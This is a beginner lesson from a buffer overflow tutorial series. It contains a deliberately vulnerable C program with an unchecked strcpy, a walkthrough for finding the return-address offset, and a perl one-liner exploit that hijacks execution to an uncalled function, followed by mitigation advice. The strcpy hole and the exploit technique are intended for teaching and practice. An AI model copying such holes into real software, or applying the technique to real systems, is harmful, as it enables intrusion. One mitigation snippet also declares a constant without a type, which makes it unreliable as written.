Travis x86 bof tutorial 01

From JaxHax
Jump to: navigation, search

Lessons Index

Lessons Index - See all lessons here.


Downloads

Download Link: X86_linux_bof_tut01_v1.0.tar.gz
File Size: 5,291 bytes
MD5 Sum: 38da23ac176e7f179d85b9d40d164026


Lesson Objective

In this lesson, you will attempt using a buffer overflow to overwrite the return address and hijack execution flow of a program to make it do something it wasn't intended to do; in this case, run the not_called() function. The function not_called(), as the name implies, is not called and should never execute. This means if we can run not_called(), we successfully took control of the program's execution flow and forced it to run code that was in the program, but was never supposed to be run.


This example is designed to be simple to follow, even for the absolute beginner; it will display addresses in the program output which means this lesson can be completed without ever using a debugger. However the walk through will not show how to do so with a debugger in this lesson, but it is encouraged that you do so as later lessons will not provide addresses like this. This is the first lesson so for now you have some training wheels, however you should learn to not be dependent on those and learn how to do it without these features. If you need a primer on GDB and debugging in Linux, see here. The first few lessons are designed to remove some complexity but once you understand it you should do it manually as well with a debugger while you have the addresses printed to help you verify your work.


What You Should Take Away From This Lesson

  • How to use a large amount of data to overflow the buffer.
  • See how it overwrites the return address to main() on the stack in vuln().
  • How to determine the length so you can control the overwrite value to hijack execution flow.
    • Manually
    • Via Metasploit's pattern tools
  • How to pass binary data as an argument to the program.
  • How to format the address to not_called() in little endian for the overwrite.


Source Code

//////////////////////////////////////////////////////////////////////
//
// Program: x86_linux_bof_tut01.c
//
// Version: v1.0
//
// Date: 04/25/2016
//
// Author: Travis Phillips
//
// Website: http://wiki.jaxhax.org/index.php/Travis%27_x86_Linux_Buffer_Overflow_Tutorial_Series
//
// Purpose: To provide an example binary that demos using a buffer
//          overflow to overwrite the return address to hijack
//          execution flow of a program and make it do something it
//          wasn't intended to do; in this case, run the not_called()
//          function.
//
// Lessons you should learn:
//       - How to use a large amount of data to overflow the buffer.
//       - See how it overwrites the return address to main() on the stack in vuln().
//       - How to determine the length so you can control the
//            overwrite value to hijack execution flow.
//       - How to format the address to not_called() in little endian for the overwrite.
//
// Compile: gcc -m32 -fno-stack-protector x86_linux_bof_tut01.c -o x86_linux_bof_tut01
//
// License: Creative Commons Attribution + ShareAlike (CC BY-SA).
//
// License Notice: You are free to copy, share, and modify the work here.
//                 You must however credit the author and website of the
//                 original work and keep this license notice. The share-alike
//                 also requires the license of the work stay on a similar license.
//
//////////////////////////////////////////////////////////////////////
 
#include <stdio.h>   // stardard library
#include <string.h>  // for strcpy()
#include <stdlib.h>  // for exit()
 
////////////////////////////////////////////
// Constants
////////////////////////////////////////////
static const char TITLE[] = "BoF Tutorial One";
static const char VERSION[] = "v1.0";
static const int ARGCOUNT = 2;
static const char ARGSTR[] = "[String]";
static const char OBJECTIVE[] = "Exploit Bof and run not_called()";
static const char * const OBJECTIVES[] = {
	"\t- How to use a large amount of data to overflow the buffer.",
	"\t- See how it overwrites the return address to main() on the stack in vuln().",
	"\t- How to determine the length so you can control the",
	"\t    overwrite value to hijack execution flow.",
	"\t- How to format the address to not_called() in little endian for the overwrite."
};
 
////////////////////////////////////////////
// Support Functions - You can ignore these
////////////////////////////////////////////
 
// A basic banner printer function. This is here to make my life easier.
void printBanner() {
	printf("\n\t\033[1m---===[ %s %s ]===---\033[0m\n", TITLE, VERSION);
	printf("\t\t\033[33;1mCode By:\033[0m Travis Phillips\n");
	printf("\t\t\033[33;1mWebsite:\033[0m http://wiki.jaxhax.org/index.php/Travis%27_x86_Linux_Buffer_Overflow_Tutorial_Series\n\n");
}
 
// A function to print the objective.
void printObjective() {
	// Let the user know the objective
	printf(" [*] \033[31;1mObjective\033[0m: %s\n", OBJECTIVE);
}
 
// A function to make sure we got the required arguments. if not then
// print the usage and objectives of the lesson and exit.
void checkArgs(int argc, char *prog_name) {
	size_t i = 0;
	if (argc != ARGCOUNT) {
		printf(" [*] \033[33;1mUsage\033[0m: %s %s\n\n", prog_name, ARGSTR);
		puts(" [*] \033[32;1mLessons you should learn\033[0m:");
		for(i = 0; i < sizeof(OBJECTIVES) / sizeof(OBJECTIVES[0]); i++){
			printf("%s\n", OBJECTIVES[i]);
		}
		printf("\n");
		exit(0);
	}
}
 
////////////////////////////////////////////
// Unique Code to This Lesson
////////////////////////////////////////////
 
// This function isn't actually called and should *NEVER* run... in theory anyways.
void not_called(char *data){
	puts("\n\t\033[32;1m[*] Code Execution redirected to not_called(), YOU WIN!\n\033[0m");
	exit(0);
}
 
// a function with a vulnerability that is called from main()
void vuln(char *data){
	// declare a local buffer of 120 bytes.
	char buffer[120];
 
	// Let the user know they are in vuln.
	puts(" [*] in vuln()");
 
	// Show them the current return address on the stack for reference.
	printf(" [*] Return address from vuln() is currently: 0x%08x\n", __builtin_return_address(0));
 
	// Perform a strcpy. This is the vulnerable code since we don't know
	// if the data will fit.
	puts(" [*] Begining strcpy to local buffer...");
	strcpy(buffer, data);
	puts(" [*] strcpy to local char buffer complete");
 
	// Print the return address again, this will let the user see if the overflow occurred.
	printf(" [*] Return address from vuln() is currently: 0x%08x\n", __builtin_return_address(0));
 
	// Let the user know they will be returning from main.
	puts(" [*] Returning from Vuln()");
}
 
// main() is the start of the program.
int main(int argc, char **argv) {
	// Print the banner.
	printBanner();
 
	// Print the objective.
	printObjective();
 
	// Check if we got an argument. If not, print the usage.
	checkArgs(argc, argv[0]);
 
	// Let the user see the address of not_called().
	printf(" [*] Current address of not_called() is: 0x%08x\n", not_called);
 
	// Call the vulnerable function.
	puts(" [*] Calling Vuln()");
	vuln(argv[1]);
 
	// Let the user know they are back in main.
	puts(" [*] Back in main()");
 
	// Let the user know it is exiting normally.
	puts(" [*] Exiting program normally\n");
	return 0;
}


Code Breakdown

So at a glance, there appears to be a lot going on here. Truth is, there isn't. A lot of it is there just to template the code. I will cover them in this first lesson so you know what they are and can ignore them.


Top Comment Block

//////////////////////////////////////////////////////////////////////
//
// Program: x86_linux_bof_tut01.c
//
// Version: v1.0
//
// Date: 04/25/2016
//
// Author: Travis Phillips
//
// Website: http://wiki.jaxhax.org/index.php/Travis%27_x86_Linux_Buffer_Overflow_Tutorial_Series
//
// Purpose: To provide an example binary that demos using a buffer
//          overflow to overwrite the return address to hijack
//          execution flow of a program and make it do something it
//          wasn't intended to do; in this case, run the not_called()
//          function.
//
// Lessons you should learn:
//       - How to use a large amount of data to overflow the buffer.
//       - See how it overwrites the return address to main() on the stack in vuln().
//       - How to determine the length so you can control the
//            overwrite value to hijack execution flow.
//       - How to format the address to not_called() in little endian for the overwrite.
//
// Compile: gcc -m32 -fno-stack-protector x86_linux_bof_tut01.c -o x86_linux_bof_tut01
//
// License: Creative Commons Attribution + ShareAlike (CC BY-SA).
//
// License Notice: You are free to copy, share, and modify the work here.
//                 You must however credit the author and website of the
//                 original work and keep this license notice. The share-alike
//                 also requires the license of the work stay on a similar license.
//
//////////////////////////////////////////////////////////////////////

First section is comments that just provide information about the program. Anything from "//" to the end of the line is considered to a comment. Comments are ignored by the compiler, they are just there for the developer to leave notes on the code. These aren't put into binary in anyway. So you can ignore comments. They are just useful for understanding what's going on, assuming the developer wrote good comments.


An important section to be aware of here is the "compile:" section. This gives you the commandline I used to build the program. In this case I use the "-m32" switch which forces it to build the program in a 32-bit architecture and "-fno-stack-protector" which ensures stack canaries are turned off (on Debian they aren't used by default but on Ubuntu they are. They are a marker that is put on the stack above the EBP and ESP values that are saved on the stack. If these "canaries" are corrupted then it is safe to assume "stack smashing" aka a buffer overflow or some other memory corruption bug occurred, and the program should exit and dump the core).


Includes

#include <stdio.h>   // stardard library
#include <string.h>  // for strcpy()
#include <stdlib.h>  // for exit()

This section is simply telling the compiler to link the headers for some standard libraries into the program. Comments are to the right of them that explain why they are there.


Constants Section

////////////////////////////////////////////
// Constants
////////////////////////////////////////////
static const char TITLE[] = "BoF Tutorial One";
static const char VERSION[] = "v1.0";
static const int ARGCOUNT = 2;
static const char ARGSTR[] = "[String]";
static const char OBJECTIVE[] = "Exploit Bof and run not_called()";
static const char * const OBJECTIVES[] = {
	"\t- How to use a large amount of data to overflow the buffer.",
	"\t- See how it overwrites the return address to main() on the stack in vuln().",
	"\t- How to determine the length so you can control the",
	"\t    overwrite value to hijack execution flow.",
	"\t- How to format the address to not_called() in little endian for the overwrite."
};

This section is just some constants to make my life as the developer easier by centralizing all the values that need to be updated from lesson to lesson in one spot. Since these are just some simple values and marked as constants, it shouldn't matter to the you as the hacker.


Support Function Section

////////////////////////////////////////////
// Support Functions - You can ignore these
////////////////////////////////////////////
 
// A basic banner printer function. This is here to make my life easier.
void printBanner() {
	printf("\n\t\033[1m---===[ %s %s ]===---\033[0m\n", TITLE, VERSION);
	printf("\t\t\033[33;1mCode By:\033[0m Travis Phillips\n");
	printf("\t\t\033[33;1mWebsite:\033[0m http://wiki.jaxhax.org/index.php/Travis%27_x86_Linux_Buffer_Overflow_Tutorial_Series\n\n");
}
 
// A function to print the objective.
void printObjective() {
	// Let the user know the objective
	printf(" [*] \033[31;1mObjective\033[0m: %s\n", OBJECTIVE);
}
 
// A function to make sure we got the required arguments. if not then
// print the usage and objectives of the lesson and exit.
void checkArgs(int argc, char *prog_name) {
	size_t i = 0;
	if (argc != ARGCOUNT) {
		printf(" [*] \033[33;1mUsage\033[0m: %s %s\n\n", prog_name, ARGSTR);
		puts(" [*] \033[32;1mLessons you should learn\033[0m:");
		for(i = 0; i < sizeof(OBJECTIVES) / sizeof(OBJECTIVES[0]); i++){
			printf("%s\n", OBJECTIVES[i]);
		}
		printf("\n");
		exit(0);
	}
}

This section contains some functions which will likely be used in all lessons, there are 3 functions here that kinda help with some simple consistent formatting between different lessons. One function prints the banner, The next prints the objective, and the last one checks that it got the required arguments, and acts accordingly. These are the functions that react to the constants sections.


"Unique Code" Comment Header

////////////////////////////////////////////
// Unique Code to This Lesson
////////////////////////////////////////////

This comment is the indicator to look for it. I will try to keep unique code that is related to the lesson BELOW this comment.


main() Function

// main() is the start of the program.
int main(int argc, char **argv) {
	// Print the banner.
	printBanner();
 
	// Print the objective.
	printObjective();
 
	// Check if we got an argument. If not, print the usage.
	checkArgs(argc, argv[0]);
 
	// Let the user see the address of not_called().
	printf(" [*] Current address of not_called() is: 0x%08x\n", not_called);
 
	// Call the vulnerable function.
	puts(" [*] Calling Vuln()");
	vuln(argv[1]);
 
	// Let the user know they are back in main.
	puts(" [*] Back in main()");
 
	// Let the user know it is exiting normally.
	puts(" [*] Exiting program normally\n");
	return 0;
}

The main() function in C/C++ is the function that will be ran when the program is loaded up and ran. Therefore it is important during a code audit to find this section and start there. This instance of main is simple; call our three support functions. Then we will use printf() to show the location of the not_called() function. The student will need this address if the want to run it in their exploit. Next we call vuln(), which is our vulnerable function. If BoF exploit is successful, we won't return from here. However if we do then we just let them know we made it back to main() then exit with a status code of zero.


vuln() Function

// a function with a vulnerability that is called from main()
void vuln(char *data){
	// declare a local buffer of 120 bytes.
	char buffer[120];
 
	// Let the user know they are in vuln.
	puts(" [*] in vuln()");
 
	// Show them the current return address on the stack for reference.
	printf(" [*] Return address from vuln() is currently: 0x%08x\n", __builtin_return_address(0));
 
	// Perform a strcpy. This is the vulnerable code since we don't know
	// if the data will fit.
	puts(" [*] Begining strcpy to local buffer...");
	strcpy(buffer, data);
	puts(" [*] strcpy to local char buffer complete");
 
	// Print the return address again, this will let the user see if the overflow occurred.
	printf(" [*] Return address from vuln() is currently: 0x%08x\n", __builtin_return_address(0));
 
	// Let the user know they will be returning from main.
	puts(" [*] Returning from Vuln()");
}

The function vuln() is where the issue lies. This function will setup a 120 byte buffer and report that it is in vuln(), making it easier to know where it is without a debugger. We then print the current return address value so the user knows what it is before our next call, which is what allows the buffer overflow, to strcpy(). The next 3 calls print a message at the beginning and end to let the user know when the call to strcpy starts and ends. This call is what is creating the actual issue. We are letting strcpy() move a user controlled string into a fixed 120 byte buffer without knowing if the user input is to big to fit into the buffer. If it is, it will keep copying the data passed the buffer on the stack, and overwrite whatever was there with the bytes from our string.


After the call to strcpy(), we will print the return address again. This allows the user to compare the before and after of the strcpy() call. If they did the overflow they will notice a difference in the return addresses. After that we let the user know we are returning from vuln(), which will return to whatever the second printed vuln() address is. This means it will return to main() if it wasn't exploited. If it was exploited successfully, it may return to not_called(). Or seg fault if the user did a buffer overflow but it didn't work out well enough to correctly overwrite the return address.


not_called() Function

// This function isn't actually called and should *NEVER* run... in theory anyways.
void not_called(char *data){
	puts("\n\t\033[32;1m[*] Code Execution redirected to not_called(), YOU WIN!\n\033[0m");
	exit(0);
}

This section isn't ever called and due to that the target of this lesson is to make it run by taking advantage of the buffer overflow to run this function. This function will simply print a message to let the user know they successfully ran it, and that they win, and then exit with a code 0.


Walkthrough

So before we dive into attacking this, let's dive into a quick crash course about x86 Linux assembly, the stack, and Linux calling conventions.


ASM Crash Course - Important Registers

In x86 assembly there some special purpose registers you need to know about when you get into exploiting BoF exploits. Registers in x86 are simple 32-bit pieces of memory that are built onto the processor for storing data that is being worked with by the processor. In assembly a lot of times these are used to try to optimize the program if it is possible to use these instead of RAM as they are really fast to access since it doesn't have to travel across the bus from the CPU to RAM. The three registers in particular which are really important to us for exploiting BoFs are EIP, ESP, and EBP.

  • EIP - Extended Instruction Pointer - Points to the address of the next instruction to be executed.
  • ESP - Extended Stack Pointer - Points to the address that is the top of the current stack frame.
  • EBP - Extended Base Pointer - Points to the address that is the bottom of the current stack frame.

EIP can't really be directly manipulated through most instructions such as POP, MOV, or PUSH; but RET, CALL, and various jumps can affect it.


ASM Crash Course - Some Important Instructions

In x86 assembly, instructions are mnemonic "codes" that perform some sort of desired action. Ones that we are interested in for now are MOV, PUSH, POP, ADD, SUB, CALL, LEAVE, and RET. The following below is in Intel syntax.


  • MOV [reg], [imm/reg] - MOV is short for MOVE. It is used to move the second parameter, which can be a register or immediate value, such as a number, into the register that is the first parameter. If the second parameter is a register, the value will stay there but also be in the first parameter. This is useful for when you need to make a copy of a value before modifying, or just a quick way to sling data to another register.


  • PUSH [imm/reg] - will push a value to the top of the stack. The value may be an immediate value, such as a number, or a register, which will place the value of that register onto the stack. This will move the ESP value up so it points to the newly added value, which is now the "top" of the stack.
    • Example: PUSH ESP
    • Example: PUSH 0xDEADBEEF


  • POP [reg] - will retrieve or "pop" a value off the stack. This should go into a register is passed with. This will decrease the value of ESP so that value is no longer the top of the stack, pretending that it was removed from the stack.
    • Example: POP ESP


  • ADD [reg], [imm/reg] - add the second parameter to the first one. The sum will be stored in the first parameter register. the second value may be a register or an immediate value, such as a number.
    • Example: ADD ESP, 0x10


  • SUB [reg], [imm/reg] - same as add, but with subtraction instead of addition.
    • Example: SUB ESP, 0x10


  • CALL [location] - This function will push the address of the instruction following it to the stack, then jump to location specified. The next address is pushed to the stack so when the called function returns, it knows where to return to; the instruction after this CALL instruction.
    • Example: CALL <vuln>


  • LEAVE - Takes no arguments. This is basically a short hand instruction that translates to the following two instructions: MOV ESP, EBP; POP EBP. This instruction is used at the end of a function to remove the current stack frame and revert to the old one from before the call to the current function. We will go more into this when we cover the stack and calling conventions, so don't sweat it if this isn't clear at this point.


  • RET - Takes no arguments. Basically this one translates into POP EIP. So basically whatever value is on top of the stack when this instruction is invoked will be placed into the register EIP, which is a special purpose register that tells the CPU the address of the next instruction to execute. RET is short for RETURN. So the next address to be execute from the function that called the current function we are in should be at the top of the stack when RET is invoked.


The Stack

The stack is a section of memory, usually in the higher memory range (0xff######) in x86. The stack is a place to store data. The stack grows upward (that is as data is pushed onto the stack, the ESP value will decrement). This is needed since there are limited registers and the each only store 32 bits of data, which wouldn't even be enough to store a sentence of text. Therefore we use the stack which has plenty of storage to store various types of data. The stack is thought of generally as a data structure which data is "popped" on to (hence the x86 assembly instruction POP) and pushed off of (hence the x86 assembly instruction PUSH). It works in a FILO (First In Last Out) structure; that is the first thing on top of the stack (which is the last thing pushed to the stack) is the first thing out. This means if I pushed a value 0xdeadbeef to the stack, then pushed 3 more values I don't care about, I would need to pop the other three values off the stack before I could pop the value 0xdeadbeef off the stack.


To keep things structured, the a program's functions will use what is known as "stack frames" to sort of partition off a section of the stack for its use when that function is called. This is were the EBP (Extended Base Pointer) comes in. If you recall, EBP was defined as a register that points to the address that is the bottom of the current stack frame and ESP points to the top of the stack frame. The stack frame will usually be created when a function is entered and when it ends it will revert to the previous stack frame for the last function so when it returns to the function that called this one, the stack will be just the way it left it.


What happens when a stack frame is create is EBP points to the bottom of the current stack frame, and ESP points to the top, the new function will create a new stack frame by:

  • Push the value in EBP (a pointer to the bottom of the stack frame of the previous function) onto the stack to save it for later recovery.
  • Move the value of ESP (points to the top of the stack) into EBP (pointer to the bottom of the stack frame), so EBP now points to the top of the stack and ESP and EBP are the same.
  • Then usually some sort of "sub esp, X" instruction, where X is a number, to grow the stack upwards from EBP. We now have a stack frame ;-)


Here is an example of these instructions happening to build at stack frame at the beginning of the vuln() function in the provided binary:
X86 linux bof01 vuln function entry.png


Once the function ends it will usually:

  • invoke the "LEAVE" instruction, which is basically the instructions "MOV ESP, EBP; POP EBP"
    • MOV ESP, EBP - sets ESP to point to the same value as EBP, this pretty much closes the stack frame and ESP will point to the saved EBP value that was saved to the stack.
    • Since ESP points to the saved EBP value on the stack, it does a "POP EBP" instruction. Now the old stack frame from the previous function was restored.
  • invoke the "RET" instruction, which will set EIP to whatever value it pops off the stack, which should be the instruction that follows the instruction that called this current function. More on this in the next section.


And a sample of the "LEAVE; RET" code happening at the end of vuln() in the provided sample binary.
X86 linux bof01 vuln function end.png


Linux C Calling Conventions

In x86 the "CALL" instruction is used to jump to another function. What will happen here is the program will reach this instruction and it will push the address of the instruction that follows the CALL instruction to the stack (saving it to the stack so the RET instruction at the end of the CALLed function knows where to return to), and jumps to the function that the CALL instruction was calling. The image below shows two steps. The top one is in main at a CALL instruction. The second is after we issues a "step into" command in the debugger, that is to execute the instruction we are on, and if it is a call, to follow it. You will notice the CALL points to an address, that address is the instruction we are on in the bottom image. You will also notice the instruction after the CALL instruction in the top image, is on the top of the stack on the bottom image. It saved that so RET will now where to go when the CALLed function is finished.


X86 linux bof01 call example.png


So the function will do its thing and at the end it will reach a "RET" instruction, This will pretty much take the value that ESP is pointing to on the stack, and set that as the value of EIP. Below is an image showing this in action in a debugger from the vuln() function in the provided example binary.


X86 linux bof01 ret example.png


On With the Show: Where Should We Start

So now that we are done with our crash course primer, where should we begin with this actual lesson against the binary provided to you? First I would like to point out that a debugger isn't needed at all to exploit this example binary. I have programmed it so it will give you all the information, primarily addresses, in the console. It is good to use this one as a way to get more comfortable with using a debugger even though it isn't needed right now. The reason for this is that this binary is friendly to step through since it gives you so much information.

So where I normally like to start is by running "file" and "checksec.sh" against the binary. First we will start with using the "file" command. The file command will try to display use information about a file that is passed to it. To run the file command, in a terminal just type "file <path_to_file>". So let's run file against the provided binary in this lesson:


X86 linux bof01 file.png


Based on the information in the output from the command, we can see:

  • It is an ELF binary, which is a type of executable program format in Linux.
  • It is a 32 bit binary for the Intel x86 architecture.
  • It is dynamically linked, which means it will import libraries (this is common for C programs and a default for the compiler unless it is told to do it statically)
  • It uses /lib/ld-linux.so.2 to load and "interpret" the ELF file.
  • That this is for Linux.
  • That it is *NOT* stripped. This means the debug symbols are not stripped out of it. GDB will be able to label functions for us. This is very useful when you have to debug it.


File provided us with a wealth of information. Let's get more by using checksec.sh. The checksec.sh script will attempt to determine what security countermeasures are in place on the binary. To use checksec.sh, run "checksec.sh --file <Path_to_ELF_binary>" in a terminal. Alternatively, this functionality is built into GDB-PEDA, just run "checksec" in GDB with the PEDA.py plug-in loaded and it will run it against the binary that it is debugging:


Checksec.sh script in action: X86 linux bof01 checksec.png


Checksec being run from within GDB-PEDA:
X86 linux bof01 checksec peda.png


As a hacker trying to exploit the binary, we are interested by the green text as these represent mitigations that are in place that we will need to circumvent. None of these really concern us for this example, as this example was intended to be simple. However I wanted you to see that in action. The "NX" thing basically means it supports what is commonly known as "DEP". In a nutshell that means that a the system should remove the execute permission from writable sections of memory and remove the write permission from memory that is executable, so that it can be writable or executable, but not both. This makes it harder to deal with injecting malicious binary code (known as shellcode) into the process and running it because a section we can write the shellcode to can't execute code, and sections that can execute code won't let us write code there. This isn't too important for this lesson, but will come up in later lessons when we talk about circumventing DEP protections. However I thought I would just expose you to DEP, and if you want to learn more about it side channel, check out the information here.


Testing The Waters: Blank Run

Now that we have a general idea about the binary, let's run it without any parameters being passed to it. I built these to display help if it is not given a parameter. It will tell you what the objective of the program is and what lessons you should be learning from this example.


X86 linux bof01 blank run.png


So we can see it gives us some syntax on the usage as well.


Testing The Waters: Some Input

So let's give it a little bit of data to see it run.


X86 linux bof01 little input run.png


So we get an actual run this time. This output shows us some important stuff we will want to know:

  • It gave use the address of the not_called() function.
  • Told us when it enter the vuln() function.
  • Showed us the current return address from vuln() before triggering the strcpy() vulnerability.
  • Showed us when it started and finished the strcpy() vulnerability.
  • Showed us the current return address from vuln() again after the strcpy() vulnerability.
  • Told us when it was returning from vuln().
  • Told us it made it back to main() from the RET in vuln().
  • Then it exits.


Testing The Waters: A Lot of Input

Now let's see what happens if we give it a lot of data, say 200 bytes of it. We will use PERL to create the string for us using command substitution $() which will run the command within it and place its output where the $() was.


X86 linux bof01 Lots of data.png


RUH-ROH! It crashed this time. From the output we can see some interesting stuff here:

  • The last output line was " [*] Returning from Vuln()". Which means it crashed when it was trying to RET.
  • The two lines with the "return address from vuln() are different. This is kind of a big deal. ;-)
    • The second return address displays 0x41414141.
    • This is interesting because the ASCII value "A" is 0x41 in hex. So our return address is basically "AAAA".
    • If you are familiar with what ASCII an how to convert it, see here


What Just Happened?

Well, if you remember earlier when we were talking about calling conventions it pointed out that the return address is written to the stack and then the stack grows upward. The data we put in goes downward. This means that data will head right towards that saved return address on the stack. The 120 bytes is the size of the buffer, it means the compiler told the program that when it built the stack frame for that function to reserve at least that much space, but it is by no means a hard limit for data going into it, that is the programmers responsibility to ensure it doesn't exceed the buffer size, strcpy() is happy to keep copying data till it finds the null byte that terminates the string. Let's take a look at the stack from the two runs we did from the start of the buffer to the return address right after the strcpy() call to see what happened.


Let's start with the "A" x 4 input:
X86 linux bof01 stack view AAAA.png


Now Let's look at the same view, but with "A" x 200 input:
X86 linux bof01 stack view lots of A.png


As we can see that 200 bytes of "A" went well past the 120 byte buffer in the second picture and overwrote the Saved EBP and Return Address. This is why the program crashed because 0x41414141 isn't a valid address in this program and this is why we also see that as the return address in the program output from the run in the last section. Now let's see what the stack looks like at the RET instruction in vuln() on both the 4 and 200 byte runs.


4 byte "A" run:
X86 linux bof01 ret 4.png


200 byte "A" run:
X86 linux bof01 ret 200.png


Why do we care about this? Because if we can control that return address, we can make it jump to a location of our choice, effectively allowing us to hijack execution flow and make it execute something other than what it was supposed to execute. In the case of this example we want it to return to not_called() rather than return to main().


Okay. So How Can I Control the Return Value?

Well... It was our input that overwrote the value of the return address right? So in theory we can control the return address, we just have to figure out how many bytes data are require before we get to the offset in the string that will be placed there. There are a few ways to do that, the simplest being to use a unique pattern tool; such as the ones provided with the Metasploit Framework or GDB-PEDA. The other way, which is handy to know if Metasploit isn't handy and was the way this was done before the pattern tool came around, is by ending the string with 4 bytes of another character and just keep adjusting the string length till the return value is that other value; this is the harder way to do this nowadays.


Finding the Offset to Overwrite the Return Address - The Hard Manual Way

When trying to find the offset for how many bytes were needed in the past, the method was to do a bunch of junk characters (in our case we will use "A"s, which are 0x41 in hex) and suffix another 4 repeating characters to the end of the string (In our case we will use 4 "B"s at the end, which are 0x42 in hex). The goal here will be to keep adjusting the length of the junk string until we fill the return address with our suffix string exclusively. One of the easiest way to do this is the old half-range trick, so we start with a range of 0-200 because we know 200 will overflow, cut that in half and use 100 plus the suffix string, and see what happens to the return strings. If it is 0x41414141, then let 100 be the new max of the range. If it is the normal return address, then 100 becomes the min of the range. If you a blend of 0x41 and 0x42, then you are really close and just need to count how many 0x42 are missing and subtract that from the junk string size and it should be right. Below is a table that kind of shows this in action:

Run Number Current Range Middle of Range Command Return Address Result
1 0-200 100 ./x86_linux_bof_tut01 $(perl -e 'print "A"x100; print "BBBB"') 0x080486a4 100 is the new min of the range
2 100-200 150 ./x86_linux_bof_tut01 $(perl -e 'print "A"x150; print "BBBB"') 0x41414141 150 is the new max of the range
3 100-150 125 ./x86_linux_bof_tut01 $(perl -e 'print "A"x125; print "BBBB"') 0x080486a4 125 is the new min of the range
4 125-150 137 ./x86_linux_bof_tut01 $(perl -e 'print "A"x137; print "BBBB"') 0x41414141 137 is the new max of the range
5 125-137 131 ./x86_linux_bof_tut01 $(perl -e 'print "A"x131; print "BBBB"') 0x00424242 Almost! That 0x00 is a null terminator, we are off by one byte! just increase the junk size by one should do the trick!
6 131-137 132 ./x86_linux_bof_tut01 $(perl -e 'print "A"x132; print "BBBB"') 0x42424242 Boom! The return address is "BBBB" now, let's change the suffix to "CCCC" which should return 0x43434343 just to verify we are correct.
7 132 132 ./x86_linux_bof_tut01 $(perl -e 'print "A"x132; print "CCCC"') 0x43434343 So we do in fact know that 132 bytes of junk will get us to the offset to overwrite the return address.


So based on this information in the table you can see we were able to determine in 6 runs basically that the offset was 132 bytes. We did a 7th run just to confirm our results. however this is "the hard way" to do it.


Finding the Offset to Overwrite the Return Address - The Lazy Hacker Way

Hackers have kind of simplified what we did in the last step with pattern generation tools. Metasploit has these tools as in the framework as well. There are two of them in the Metasploit framework to be exact that work together. The first is pattern_create.rb and the second is pattern_offset.rb. They should be located under the tools/ or tools/exploit/ directories of your Metasploit install directory depend on which version you are running. The pattern_create.rb tool will allow you to provide it with a size and it will generate a pattern of that size that is unique. The idea is to use that as your overflow string and once it overflows the return address the return address should be ASCII characters from that unique pattern, which is where pattern_offset comes in. If you provide pattern_offset the size of that pattern and the return address, it will tell you how many bytes it took to get there. This process is the lazy method as it removes the guesswork. So let's walk through this.


First we need to generate our pattern using Metasploit's pattern_create.rb tool. We will use 200 bytes as our length because we know that will overflow the return address:
X86 linux bof01 pattern create.png


Next let's use the pattern that was generated to overflow the return address. We will want to take note of the return address as it :
X86 linux bof01 pattern overflow.png


Lastly, we need to provide the ASCII over-written return address value to the pattern_offset.rb tool:
X86 linux bof01 pattern offset.png


And BOOM! we now know it is 132 bytes to reach the offset. This tool is very useful because if their are values that end up in registers just before the crash that you may want to control as well, you can just provide their values to pattern_offset.rb and know how many bytes to do so.


Great! So Now I Control the Return Address! Where Do I Make it Go?

Well, the objective said we should try to make it run the function not_called() and it provides us with the address (0x0804859b) to that. Now how do we place the that value into our string? Well, That was part of why we are using the PERL print statements. PERL supports "\x##" formatting to place a hexadecimal value into a string. So let's try putting that address in as our return address overwrite value.


X86 linux bof01 overflow failed.png


Okay, Address Was Put In... Why Did It Fail?

Why did it fail, well if we look at the return address we can see it seems to be backwards.
X86 linux bof01 overflow failed endian.png


Little Endian Formatting the Address

This happened due to an the way that x86 stores thing in memory. It uses a method know as "little endian" which basically translate to you as "reverse the order of 4 byte sequences (4 byte values are also known as DWORDS)". If you really want to dive into little endian vs big endian, see here. Either way based on what we can see in the picture it's not hard to see how you would compensate for this by simply reversing the over-write value.


Examples:

  • 0x41424344 would have to be formatted as "\x44\x43\x42\x41"
  • 0xdeadbeef would have to be formatted as "\xef\xbe\xad\xde"
  • 0xcafebabe would have to be formatted as "\xbe\xba\xfe\xca"
  • 0x0badf00d would have to be formatted as "\x0d\xf0\xad\x0b"


Final Exploit

The final exploit against this program is as follows:


./x86_linux_bof_tut01 $(perl -e 'print "A"x132; print "\x9b\x85\x04\x08"')


X86 linux bof tut01 v1.0 final exploit.png


How Could This of Been Avoided?

The simplest way to have avoided this issue would to be to avoid strcpy() in favor of strncpy() or to place some bound checks on the user input before using strcpy(). Bound checks are simply checking the size of the user supplied input using something like strlen() to ensure it will fit into our buffer nicely. "Nicely sized" should be the size of the buffer minus one byte. We would subtract one byte due to the null byte to terminate the string. strncpy() is almost like strcpy(), however it has a size argument that can be set that will truncate once it reaches that size. It is important to note that strncpy(), if used in correctly, will result in a buffer overflow condition as well should the developer for some reason misuse it by setting the size parameter to be equal to the length of the user supplied buffer while still using a fixed sized buffer; it effectively null and voids the entire point of the check but is worth noting since I have seen this done before. Usually the best practice is to:

  1. Set a constant for it's size, use that constant when declaring the size of the char array, then passing the constant minus one as size parameter into strncpy()
  2. Set the size of the char array statically, then use sizeof(buffer) minus one as the size parameter of strncpy.


Example 1: Using the constant minus one method.

	// Create a constant for the buffer size, this could be a global if desired.
	const BUFF_SIZE = 120;
 
	// Declare a local buffer.
	char buffer[BUFF_SIZE];
 
        // Safe way to copy the string.
	strncpy(buffer, data, (BUFF_SIZE - 1));


Example 2: Using the sizeof minus one method.

	// Declare a local buffer with a direct size.
	char buffer[120];
 
        // Safe way to copy the string.
	strncpy(buffer, data, (sizeof(buffer) - 1));


Example 3:
THE WRONG WAY TO USE strncpy() THAT WILL MAKE A BUFFER OVERFLOW CONDITION! SO DON'T DO THIS!
	// Declare a local buffer with a direct size.
	char buffer[120];
 
        // Wrong way to use strncpy by setting the size to user controlled data.
        // This will create a buffer overflow condition since "data" is user controlled
        // and maybe larger than the buffer. Might as well be strcpy() due to this.
	strncpy(buffer, data, strlen(data));


Either of those first would have worked out safely. The third would have been an exploitable condition the same as we already had.


If you are bent on using strcpy() for some reason, which is advised against, you could also have used strlen() on the user data in an evaluation of an if statement to ensure it was one byte smaller than the buffer. If it wasn't, then you could through and error or truncate the string yourself by injecting a null byte at the highest offset minus one (remember that offset[120] is actually the 121st byte in the string because the index starts at zero) you could allow into your buffer. This isn't recommended because it is easy for off-by-one errors, sometimes called fence post errors [because you need one less fence panel than you do fence post, a simple mistake to make is to buy the same quantity of both if you aren't giving it much thought]. These errors sometimes can result in an off-by-one bug that actually becomes a security flaw by allowing an attacker to modify the lowest byte of the next DWORD on the stack.


